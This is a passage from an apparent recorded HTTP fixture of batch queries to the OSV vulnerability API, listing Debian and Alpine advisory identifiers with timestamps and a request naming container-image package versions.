"DEBIAN-CVE-2025-6170", "modified": "2025-11-20T10:18:26.670728Z" }, { "id": "DEBIAN-CVE-2025-8732", "modified": "2025-12-14T10:13:26.467517Z" }, { "id": "DEBIAN-CVE-2025-9714", "modified": "2026-01-10T14:08:12.148171Z" }, { "id": "DEBIAN-CVE-2026-0989", "modified": "2026-01-16T11:05:07.928323Z" }, { "id": "DEBIAN-CVE-2026-0990", "modified": "2026-01-16T11:05:23.527352Z" }, { "id": "DEBIAN-CVE-2026-0992", "modified": "2026-01-16T11:05:10.515041Z" }, { "id": "DEBIAN-CVE-2026-1757", "modified": "2026-02-03T11:16:44.779248Z" }, { "id": "DLA-3012-1", "modified": "2026-03-09T01:20:46.878115Z" }, { "id": "DLA-3172-1", "modified": "2026-03-09T01:19:54.747665Z" }, { "id": "DLA-3405-1", "modified": "2026-03-09T01:01:29.748040Z" }, { "id": "DLA-3878-1", "modified": "2026-03-09T01:20:38.676387Z" }, { "id": "DLA-4064-1", "modified": "2026-03-09T01:20:30.558703Z" }, { "id": "DLA-4146-1", "modified": "2026-03-09T01:22:43.732573Z" }, { "id": "DLA-4251-1", "modified": "2026-03-09T02:11:12.986866Z" }, { "id": "DLA-4319-1", "modified": "2025-09-30T22:17:08.381361Z" }, { "id": "DSA-5142-1", "modified": "2026-03-09T02:10:58.737631Z" }, { "id": "DSA-5271-1", "modified": "2026-03-09T02:10:55.154283Z" }, { "id": "DSA-5391-1", "modified": "2026-03-09T02:09:39.164621Z" }, { "id": "DSA-5949-1", "modified": "2026-03-09T02:09:32.257423Z" }, { "id": "DSA-5990-1", "modified": "2025-08-29T13:01:48.117026Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2018-0732", "modified": "2025-11-19T02:02:54.249966Z" }, { "id": "DEBIAN-CVE-2018-0734", "modified": "2025-11-19T02:02:43.768735Z" }, { "id": "DEBIAN-CVE-2018-0735", "modified": "2025-11-19T01:19:04.251217Z" }, { "id": "DEBIAN-CVE-2018-5407", "modified": "2025-11-19T01:02:00.203143Z" }, { "id": "DEBIAN-CVE-2019-1543", "modified": "2025-11-19T01:12:34.981629Z" }, { "id": "DEBIAN-CVE-2019-1547", "modified": "2025-11-19T01:12:35.687253Z" }, { "id": "DEBIAN-CVE-2019-1549", "modified": "2025-11-19T01:04:40.924710Z" }, { "id": "DEBIAN-CVE-2019-1551", "modified": "2025-11-19T01:19:08.067279Z" }, { "id": "DEBIAN-CVE-2019-1563", "modified": "2025-11-19T02:04:34.392400Z" }, { "id": "DEBIAN-CVE-2020-1967", "modified": "2025-11-19T02:04:38.886020Z" }, { "id": "DEBIAN-CVE-2020-1971", "modified": "2025-11-19T02:04:28.520483Z" }, { "id": "DEBIAN-CVE-2021-23840", "modified": "2025-11-19T01:03:14.356310Z" }, { "id": "DEBIAN-CVE-2021-23841", "modified": "2025-11-19T02:02:54.160482Z" }, { "id": "DEBIAN-CVE-2021-3449", "modified": "2025-11-19T01:04:41.495834Z" }, { "id": "DEBIAN-CVE-2021-3450", "modified": "2025-11-19T02:01:16.123253Z" }, { "id": "DEBIAN-CVE-2021-3711", "modified": "2025-11-20T10:15:44.121033Z" }, { "id": "DEBIAN-CVE-2021-3712", "modified": "2025-11-20T10:15:44.130193Z" }, { "id": "DEBIAN-CVE-2021-4160", "modified": "2025-11-20T10:15:10.185497Z" }, { "id": "DEBIAN-CVE-2022-0778", "modified": "2025-11-20T10:15:47.332694Z" }, { "id": "DEBIAN-CVE-2022-1292", "modified": "2025-11-20T10:15:25.471825Z" }, { "id": "DEBIAN-CVE-2022-2068", "modified": "2025-11-20T10:15:27.022420Z" }, { "id": "DEBIAN-CVE-2022-2097", "modified": "2025-11-20T10:15:27.065089Z" }, { "id": "DEBIAN-CVE-2022-2274", "modified": "2025-11-19T02:02:45.418259Z" }, { "id": "DEBIAN-CVE-2022-3358", "modified": "2025-11-19T01:06:25.721124Z" }, { "id": "DEBIAN-CVE-2022-3602", "modified": "2025-11-19T01:12:35.687556Z" }, { "id": "DEBIAN-CVE-2022-3786", "modified": "2025-11-19T01:19:02.748977Z" }, { "id": "DEBIAN-CVE-2022-3996", "modified": "2025-11-19T02:01:16.596616Z" }, { "id": "DEBIAN-CVE-2022-4203", "modified": "2025-11-19T02:01:16.313531Z" }, { "id": "DEBIAN-CVE-2022-4304", "modified": "2025-11-20T10:16:04.313466Z" }, { "id": "DEBIAN-CVE-2022-4450", "modified": "2025-11-20T10:16:05.367442Z" }, { "id": "DEBIAN-CVE-2023-0215", "modified": "2025-11-20T10:16:27.838296Z" }, { "id": "DEBIAN-CVE-2023-0216", "modified": "2025-11-19T02:04:35.947667Z" }, { "id": "DEBIAN-CVE-2023-0217", "modified": "2025-11-19T01:12:37.272749Z" }, { "id": "DEBIAN-CVE-2023-0286", "modified": "2025-11-20T10:16:27.985311Z" }, { "id": "DEBIAN-CVE-2023-0401", "modified": "2025-11-19T01:12:36.298552Z" }, { "id": "DEBIAN-CVE-2023-0464", "modified": "2025-11-20T10:16:28.057931Z" }, { "id": "DEBIAN-CVE-2023-0465", "modified": "2025-11-20T10:16:28.143046Z" }, { "id": "DEBIAN-CVE-2023-0466", "modified": "2025-11-20T10:16:28.053837Z" }, { "id": "DEBIAN-CVE-2023-1255", "modified": "2025-11-19T01:08:49.387669Z" }, { "id": "DEBIAN-CVE-2023-2650", "modified": "2025-11-20T10:17:34.439123Z" }, { "id": "DEBIAN-CVE-2023-2975", "modified": "2025-11-20T10:16:36.112183Z" }, { "id": "DEBIAN-CVE-2023-3446", "modified": "2025-11-20T10:16:38.860251Z" }, { "id": "DEBIAN-CVE-2023-3817", "modified": "2025-11-20T10:17:35.737266Z" }, { "id": "DEBIAN-CVE-2023-5363", "modified": "2025-11-20T10:16:59.430619Z" }, { "id": "DEBIAN-CVE-2023-5678", "modified": "2025-11-20T10:17:38.719690Z" }, { "id": "DEBIAN-CVE-2023-6129", "modified": "2025-11-20T10:17:39.029757Z" }, { "id": "DEBIAN-CVE-2023-6237", "modified": "2025-11-20T10:17:39.218097Z" }, { "id": "DEBIAN-CVE-2024-0727", "modified": "2025-11-20T10:17:01.258658Z" }, { "id": "DEBIAN-CVE-2024-12797", "modified": "2025-11-19T02:04:36.131726Z" }, { "id": "DEBIAN-CVE-2024-13176", "modified": "2026-03-17T02:49:44.824285Z" }, { "id": "DEBIAN-CVE-2024-2511", "modified": "2025-11-20T10:17:05.139581Z" }, { "id": "DEBIAN-CVE-2024-4603", "modified": "2025-11-20T10:17:43.955114Z" }, { "id": "DEBIAN-CVE-2024-4741", "modified": "2025-11-20T10:17:26.990307Z" }, { "id": "DEBIAN-CVE-2024-5535", "modified": "2025-11-20T10:17:48.194687Z" }, { "id": "DEBIAN-CVE-2024-6119", "modified": "2025-11-20T10:17:53.824117Z" }, { "id": "DEBIAN-CVE-2024-9143", "modified": "2025-11-20T10:17:55.864918Z" }, { "id": "DEBIAN-CVE-2025-11187", "modified": "2026-03-17T02:47:10.761659Z" }, { "id": "DEBIAN-CVE-2025-15467", "modified": "2026-03-17T02:51:11.866899Z" }, { "id": "DEBIAN-CVE-2025-15468", "modified": "2026-03-17T02:51:12.304672Z" }, { "id": "DEBIAN-CVE-2025-15469", "modified": "2026-03-17T02:51:12.299847Z" }, { "id": "DEBIAN-CVE-2025-27587", "modified": "2026-03-17T02:51:34.552234Z" }, { "id": "DEBIAN-CVE-2025-4575", "modified": "2025-11-19T02:02:43.971243Z" }, { "id": "DEBIAN-CVE-2025-66199", "modified": "2026-03-17T02:52:26.091887Z" }, { "id": "DEBIAN-CVE-2025-68160", "modified": "2026-03-17T02:50:42.645267Z" }, { "id": "DEBIAN-CVE-2025-69418", "modified": "2026-03-17T02:51:22.404226Z" }, { "id": "DEBIAN-CVE-2025-69419", "modified": "2026-03-17T02:51:22.497785Z" }, { "id": "DEBIAN-CVE-2025-69420", "modified": "2026-03-17T02:51:22.651361Z" }, { "id": "DEBIAN-CVE-2025-69421", "modified": "2026-03-17T02:51:22.561721Z" }, { "id": "DEBIAN-CVE-2025-9230", "modified": "2026-03-17T02:51:39.764914Z" }, { "id": "DEBIAN-CVE-2025-9231", "modified": "2026-03-17T02:51:39.727656Z" }, { "id": "DEBIAN-CVE-2025-9232", "modified": "2026-03-17T02:51:39.882696Z" }, { "id": "DEBIAN-CVE-2026-22795", "modified": "2026-03-17T02:51:47.646020Z" }, { "id": "DEBIAN-CVE-2026-22796", "modified": "2026-03-17T02:51:47.743030Z" }, { "id": "DEBIAN-CVE-2026-2673", "modified": "2026-03-18T09:03:28.363302Z" }, { "id": "DLA-3008-1", "modified": "2026-03-09T01:23:33.375630Z" }, { "id": "DLA-3325-1", "modified": "2026-03-09T01:19:40.983935Z" }, { "id": "DLA-3449-1", "modified": "2026-03-09T01:22:47.322805Z" }, { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" }, { "id": "DLA-3942-1", "modified": "2026-03-09T01:22:40.686044Z" }, { "id": "DLA-3942-2", "modified": "2026-03-09T01:21:01.728730Z" }, { "id": "DLA-4176-1", "modified": "2026-03-09T01:20:23.459313Z" }, { "id": "DLA-4321-1", "modified": "2025-10-03T16:33:24.717173Z" }, { "id": "DLA-4490-1", "modified": "2026-02-23T10:30:28.927832Z" }, { "id": "DSA-4539-1", "modified": "2026-03-09T02:09:20.276054Z" }, { "id": "DSA-4539-3", "modified": "2025-05-26T07:05:14.261652Z" }, { "id": "DSA-4661-1", "modified": "2026-03-09T02:08:53.792348Z" }, { "id": "DSA-4807-1", "modified": "2026-03-09T02:10:20.442914Z" }, { "id": "DSA-4855-1", "modified": "2026-03-09T02:11:29.405206Z" }, { "id": "DSA-4875-1", "modified": "2026-03-09T02:10:05.387501Z" }, { "id": "DSA-4963-1", "modified": "2026-03-09T02:10:15.488747Z" }, { "id": "DSA-5103-1", "modified": "2026-03-09T02:09:42.407559Z" }, { "id": "DSA-5139-1", "modified": "2026-03-09T02:09:17.334653Z" }, { "id": "DSA-5169-1", "modified": "2026-03-09T02:09:37.692763Z" }, { "id": "DSA-5343-1", "modified": "2026-03-09T02:09:47.149297Z" }, { "id": "DSA-5417-1", "modified": "2026-03-09T02:09:39.950679Z" }, { "id": "DSA-5532-1", "modified": "2026-03-09T02:08:31.395482Z" }, { "id": "DSA-5764-1", "modified": "2026-03-09T02:09:02.723874Z" }, { "id": "DSA-6015-1", "modified": "2025-10-01T13:32:01.848986Z" }, { "id": "DSA-6113-1", "modified": "2026-01-27T20:30:04.397078Z" } ] }, {}, { "vulns": [ { "id": "DEBIAN-CVE-2011-4116", "modified": "2025-11-20T10:10:50.058601Z" }, { "id": "DEBIAN-CVE-2017-12837", "modified": "2025-11-19T01:03:14.361068Z" }, { "id": "DEBIAN-CVE-2017-12883", "modified": "2025-11-19T01:12:38.323688Z" }, { "id": "DEBIAN-CVE-2018-12015", "modified": "2025-11-19T02:02:49.033339Z" }, { "id": "DEBIAN-CVE-2018-18311", "modified": "2025-11-19T01:12:36.918544Z" }, { "id": "DEBIAN-CVE-2018-18312", "modified": "2025-11-19T02:04:33.584277Z" }, { "id": "DEBIAN-CVE-2018-18313", "modified": "2025-11-19T01:06:24.154928Z" }, { "id": "DEBIAN-CVE-2018-18314", "modified": "2025-11-19T01:12:35.416886Z" }, { "id": "DEBIAN-CVE-2018-6797", "modified": "2025-11-19T02:04:23.831823Z" }, { "id": "DEBIAN-CVE-2018-6798", "modified": "2025-11-19T02:02:49.628171Z" }, { "id": "DEBIAN-CVE-2018-6913", "modified": "2025-11-19T02:02:50.593437Z" }, { "id": "DEBIAN-CVE-2020-10543", "modified": "2025-11-19T01:04:39.904198Z" }, { "id": "DEBIAN-CVE-2020-10878", "modified": "2025-11-19T01:12:35.457057Z" }, { "id": "DEBIAN-CVE-2020-12723", "modified": "2025-11-19T02:02:47.094787Z" }, { "id": "DEBIAN-CVE-2020-16156", "modified": "2025-11-20T10:14:36.701112Z" }, { "id": "DEBIAN-CVE-2021-36770", "modified": "2025-11-20T10:15:44.080114Z" }, { "id": "DEBIAN-CVE-2022-48522", "modified": "2025-11-19T01:08:52.915564Z" }, { "id": "DEBIAN-CVE-2023-31484", "modified": "2025-11-20T10:17:35.627220Z" }, { "id": "DEBIAN-CVE-2023-31486", "modified": "2026-03-17T02:48:35.857896Z" }, { "id": "DEBIAN-CVE-2023-47038", "modified": "2025-11-20T10:16:46.343364Z" }, { "id": "DEBIAN-CVE-2024-56406", "modified": "2025-11-20T10:17:48.686371Z" }, { "id": "DEBIAN-CVE-2025-40909", "modified": "2025-11-20T10:18:21.143971Z" }, { "id": "DLA-3926-1", "modified": "2026-03-09T01:20:46.118633Z" }, { "id": "DSA-5902-1", "modified": "2026-03-09T02:09:19.793163Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3072-1", "modified": "2026-03-09T01:22:24.680239Z" }, { "id": "DLA-3189-1", "modified": "2025-05-26T07:01:07.887113Z" }, { "id": "DLA-3316-1", "modified": "2025-05-26T07:01:13.127412Z" }, { "id": "DLA-3422-1", "modified": "2026-03-09T01:20:56.692752Z" }, { "id": "DLA-3600-1", "modified": "2026-03-09T01:17:49.966197Z" }, { "id": "DLA-3651-1", "modified": "2026-03-09T01:18:05.310519Z" }, { "id": "DLA-3764-1", "modified": "2026-03-09T01:23:22.273526Z" }, { "id": "DSA-5135-1", "modified": "2026-03-09T02:11:21.646978Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2017-17512", "modified": "2025-11-19T02:04:30.656495Z" } ] }, {}, {}, { "vulns": [ { "id": "DEBIAN-CVE-2005-2541", "modified": "2026-03-17T02:42:47.789952Z" }, { "id": "DEBIAN-CVE-2018-20482", "modified": "2025-11-19T02:02:47.070832Z" }, { "id": "DEBIAN-CVE-2019-9923", "modified": "2025-11-19T02:02:53.559001Z" }, { "id": "DEBIAN-CVE-2021-20193", "modified": "2025-11-19T01:01:55.139356Z" }, { "id": "DEBIAN-CVE-2022-48303", "modified": "2025-11-20T10:16:07.552593Z" }, { "id": "DEBIAN-CVE-2023-39804", "modified": "2025-11-20T10:16:41.587973Z" }, { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3051-1", "modified": "2025-05-26T07:01:56.257796Z" }, { "id": "DLA-3134-1", "modified": "2025-05-26T07:01:01.500124Z" }, { "id": "DLA-3161-1", "modified": "2025-05-26T07:01:03.882213Z" }, { "id": "DLA-3366-1", "modified": "2025-05-26T07:01:17.027142Z" }, { "id": "DLA-3412-1", "modified": "2025-05-26T07:01:20.109212Z" }, { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" }, { "id": "DLA-3972-1", "modified": "2025-05-26T07:02:05.284676Z" }, { "id": "DLA-4085-1", "modified": "2025-05-26T07:02:10.958749Z" }, { "id": "DLA-4105-1", "modified": "2025-05-26T07:02:13.921097Z" }, { "id": "DLA-4403-1", "modified": "2025-12-12T10:13:37.154747Z" } ] }, { "vulns": [ { "id": "DLA-4016-1", "modified": "2025-05-26T07:02:06.504254Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2016-2779", "modified": "2025-11-19T01:12:38.591462Z" }, { "id": "DEBIAN-CVE-2018-7738", "modified": "2025-11-20T10:13:54.493707Z" }, { "id": "DEBIAN-CVE-2021-37600", "modified": "2025-11-19T02:02:43.997954Z" }, { "id": "DEBIAN-CVE-2021-3995", "modified": "2025-11-20T10:15:45.587792Z" }, { "id": "DEBIAN-CVE-2021-3996", "modified": "2025-11-20T10:15:45.602424Z" }, { "id": "DEBIAN-CVE-2022-0563", "modified": "2026-03-17T02:46:43.123134Z" }, { "id": "DEBIAN-CVE-2024-28085", "modified": "2025-11-20T10:17:41.612682Z" }, { "id": "DEBIAN-CVE-2025-14104", "modified": "2026-03-05T17:00:58.361610Z" }, { "id": "DEBIAN-CVE-2026-3184", "modified": "2026-02-26T09:30:44.219098Z" }, { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" }, { "id": "DSA-5055-1", "modified": "2026-03-09T02:10:40.826335Z" }, { "id": "DSA-5650-1", "modified": "2026-03-09T02:08:30.371343Z" } ] }, { "vulns": [ { "id": "DEBIAN-CVE-2022-1271", "modified": "2025-11-20T10:15:47.940295Z" }, { "id": "DEBIAN-CVE-2024-3094", "modified": "2025-11-19T01:12:34.542011Z" }, { "id": "DEBIAN-CVE-2025-31115", "modified": "2025-11-20T10:18:07.484724Z" }, { "id": "DSA-5123-1", "modified": "2026-03-09T02:10:46.054497Z" }, { "id": "DSA-5895-1", "modified": "2026-03-09T02:08:52.515269Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "22298" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 19884 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" }, { "package": { "ecosystem": "Debian", "name": "adduser" }, "version": "3.115" }, { "package": { "ecosystem": "Debian", "name": "apt" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "base-files" }, "version": "9.9+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "base-passwd" }, "version": "3.5.43" }, { "package": { "ecosystem": "Debian", "name": "bash" }, "version": "4.4-5" }, { "package": { "ecosystem": "Debian", "name": "bsdutils" }, "version": "1:2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "coreutils" }, "version": "8.26-3" }, { "package": { "ecosystem": "Debian", "name": "dash" }, "version": "0.5.8-2.4" }, { "package": { "ecosystem": "Debian", "name": "debconf" }, "version": "1.5.61" }, { "package": { "ecosystem": "Debian", "name": "debian-archive-keyring" }, "version": "2017.5+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "debianutils" }, "version": "4.8.1.1" }, { "package": { "ecosystem": "Debian", "name": "diffutils" }, "version": "1:3.5-3" }, { "package": { "ecosystem": "Debian", "name": "dirmngr" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "dpkg" }, "version": "1.18.25" }, { "package": { "ecosystem": "Debian", "name": "e2fslibs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "e2fsprogs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "findutils" }, "version": "4.6.0+git+20161106-2" }, { "package": { "ecosystem": "Debian", "name": "gcc-6-base" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc" }, "version": "v1.0.1" }, { "package": { "ecosystem": "Go", "name": "github.com/tianon/gosu" }, "version": "(devel)" }, { "package": { "ecosystem": "Debian", "name": "gnupg" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "gnupg-agent" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/sys" }, "version": "v0.0.0-20210817142637-7d9622a276b7" }, { "package": { "ecosystem": "Debian", "name": "gpgv" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "grep" }, "version": "2.27-2" }, { "package": { "ecosystem": "Debian", "name": "gzip" }, "version": "1.6-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "hostname" }, "version": "3.18+b1" }, { "package": { "ecosystem": "Debian", "name": "init-system-helpers" }, "version": "1.48" }, { "package": { "ecosystem": "Debian", "name": "libacl1" }, "version": "2.2.52-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libapt-pkg5.0" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "libassuan0" }, "version": "2.4.3-2" }, { "package": { "ecosystem": "Debian", "name": "libattr1" }, "version": "1:2.4.47-2+b2" }, { "package": { "ecosystem": "Debian", "name": "libaudit-common" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libaudit1" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libblkid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbsd0" }, "version": "0.8.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbz2-1.0" }, "version": "1.0.6-8.1" }, { "package": { "ecosystem": "Debian", "name": "libc-bin" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc-l10n" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc6" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libcap-ng0" }, "version": "0.7.7-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libcomerr2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libdb5.3" }, "version": "5.3.28-12+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libdebconfclient0" }, "version": "0.227" }, { "package": { "ecosystem": "Debian", "name": "libedit2" }, "version": "3.1-20160903-3" }, { "package": { "ecosystem": "Debian", "name": "libfdisk1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libffi6" }, "version": "3.2.1-6" }, { "package": { "ecosystem": "Debian", "name": "libgcc1" }, "version": "1:6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgcrypt20" }, "version": "1.7.6-2+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libgdbm3" }, "version": "1.8.3-14" }, { "package": { "ecosystem": "Debian", "name": "libgmp10" }, "version": "2:6.1.2+dfsg-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgnutls30" }, "version": "3.5.8-5+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libgpg-error0" }, "version": "1.26-2" }, { "package": { "ecosystem": "Debian", "name": "libgssapi-krb5-2" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libhogweed4" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libicu57" }, "version": "57.1-6+deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libidn11" }, "version": "1.33-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libjson-perl" }, "version": "2.90-1" }, { "package": { "ecosystem": "Debian", "name": "libk5crypto3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkeyutils1" }, "version": "1.5.9-9" }, { "package": { "ecosystem": "Debian", "name": "libkrb5-3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkrb5support0" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libksba8" }, "version": "1.3.5-2" }, { "package": { "ecosystem": "Debian", "name": "libldap-2.4-2" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libldap-common" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libllvm6.0" }, "version": "1:6.0-1~bpo9+1" }, { "package": { "ecosystem": "Debian", "name": "liblz4-1" }, "version": "0.0~r131-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "liblzma5" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libmount1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libncurses5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libncursesw5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libnettle6" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libnpth0" }, "version": "1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libnss-wrapper" }, "version": "1.1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libp11-kit0" }, "version": "0.23.3-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules-bin" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-runtime" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam0g" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpcre3" }, "version": "2:8.39-3" }, { "package": { "ecosystem": "Debian", "name": "libperl5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "libpq5" }, "version": "14.2-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "libreadline7" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-2" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-modules-db" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libselinux1" }, "version": "2.6-3+b3" }, { "package": { "ecosystem": "Debian", "name": "libsemanage-common" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsemanage1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsepol1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsmartcols1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsqlite3-0" }, "version": "3.16.2-5+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libss2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libssl1.1" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libstdc++6" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsystemd0" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libtasn1-6" }, "version": "4.10-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libtinfo5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libudev1" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libustr-1.0-1" }, "version": "1.0.4-6" }, { "package": { "ecosystem": "Debian", "name": "libuuid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libxml2" }, "version": "2.9.4+dfsg1-2.2+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libxslt1.1" }, "version": "1.1.29-2.1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libzstd1" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "locales" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "login" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "lsb-base" }, "version": "9.20161125" }, { "package": { "ecosystem": "Debian", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian", "name": "mount" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "multiarch-support" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "ncurses-base" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "ncurses-bin" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "netbase" }, "version": "5.4" }, { "package": { "ecosystem": "Debian", "name": "openssl" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "passwd" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "perl" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "perl-base" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", 